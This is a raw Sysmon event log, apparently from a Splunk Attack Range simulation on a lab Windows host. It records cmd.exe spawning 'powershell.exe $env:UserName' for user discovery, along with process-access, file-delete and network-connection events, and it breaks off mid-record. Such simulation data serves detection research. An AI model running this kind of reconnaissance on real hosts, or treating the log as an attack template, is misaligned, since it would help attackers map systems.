13:24:19.586{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498877Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.586{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498876Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.586{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-A283-6140-BD56-04000000C801}6488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498875Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.586{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498874Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.586{B81B27B7-A283-6140-BC56-04000000C801}45721960C:\Windows\system32\cmd.exe{B81B27B7-A283-6140-BD56-04000000C801}6488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498873Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.590{B81B27B7-A283-6140-BD56-04000000C801}6488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe $env:UserName C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{B81B27B7-A283-6140-BC56-04000000C801}4572C:\Windows\System32\cmd.execmd.exe /c powershell.exe $env:UserName 10341000x800000000000000036498872Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.571{B81B27B7-6639-6125-B100-01000000C801}65365024C:\Windows\system32\conhost.exe{B81B27B7-A283-6140-BC56-04000000C801}4572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498871Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.571{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498870Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.571{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498869Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.571{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498868Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.571{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498867Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.571{B81B27B7-4130-611D-9D00-00000000C801}31603888C:\Windows\system32\csrss.exe{B81B27B7-A283-6140-BC56-04000000C801}4572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498866Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.571{B81B27B7-6638-6125-B000-01000000C801}12085068C:\Windows\system32\cmd.exe{B81B27B7-A283-6140-BC56-04000000C801}4572C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+1ace3|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498865Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.579{B81B27B7-A283-6140-BC56-04000000C801}4572C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Execmd.exe /c powershell.exe $env:UserName C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{B81B27B7-6638-6125-B000-01000000C801}1208C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" 23542300x800000000000000036498864Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:19.018{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE54FC5A365EE073F4D4CA3DB26ACE58,SHA256=517FCD806D4032DA67210D9BB5718774FF1F6F9DAD3B9ABF0236102A904910C3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498894Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:20.671{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9A41B5516920D1515BC41519A72F993C,SHA256=18243CED568CF2F7B204043A2454B235944206520DEA3574B30D0CDC83AD1903,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498893Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:20.571{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B9FB00E0057A535AC25DE42FE5E42DD9,SHA256=14543053D08FC67AD3CE53B32D24A9B6D52382DAFE645DEA62F20E93D15A1545,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498892Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:20.571{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2148CAC7564CF1509B909AA52A39340F,SHA256=032D94F475A3DCAD0D1CC71E80FE04AAE59F90794846D2B895B7D65F553235BA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498891Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:20.040{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=052D82B9D64CCF3AC99AB989F74F2E2E,SHA256=799C08E23D88CD66560339EAEDA622C76F7D96315A9A6196229899A80DC7A190,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498895Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:21.054{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C75417E06D2A2DC4919F5CE618D95732,SHA256=05B034480A913C3ADB7F171411AE119EF73CFC957EDA149B7138455E312CFF3C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036498898Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:52.910{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50704-false10.0.1.12-8000- 354300x800000000000000036498897Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:52.348{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50703-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036498896Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:22.100{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A008265424563D4B09236F37A0FAA9F6,SHA256=C2252B51E0BEF18180F3813B735EC522048A6CC38B5BA0750F51DC4D5CCC54E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498900Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:23.284{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=50F5CE5628848D0A64A7A7E22632642B,SHA256=21D1147AC29133D4076AD82D4CED3BA1FD9388B8AE18F6B7FDE95510EEBC1339,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036498899Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:23.137{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A23FEF27389E273CB4BA76177B61692,SHA256=22B91A92798C2969D97E35CE35E07787F9953E5122DFB50C0D9A0A891FC59525,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498918Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.698{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A288-6140-BF56-04000000C801}7064C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498917Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.698{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498916Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.698{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498915Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.698{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498914Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.698{B81B27B7-4012-611D-0C00-00000000C801}7326156C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036498913Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.698{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A288-6140-BF56-04000000C801}7064C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036498912Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.698{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A288-6140-BF56-04000000C801}7064C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036498911Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.683{B81B27B7-A288-6140-BF56-04000000C801}7064C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000036498910Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.298{B81B27B7-A288-6140-BE56-04000000C801}37684852C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036498909Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.183{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E8445FA88F6DB906738E339F728B9CD,SHA256=A98C093D8BDEDDB69D4D5648FD248D2ABE5EC72733591E86577AAC9A468104C9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036498908Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:24:24.136{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A288-6140-BE56-04000000C801}3768C:\Program 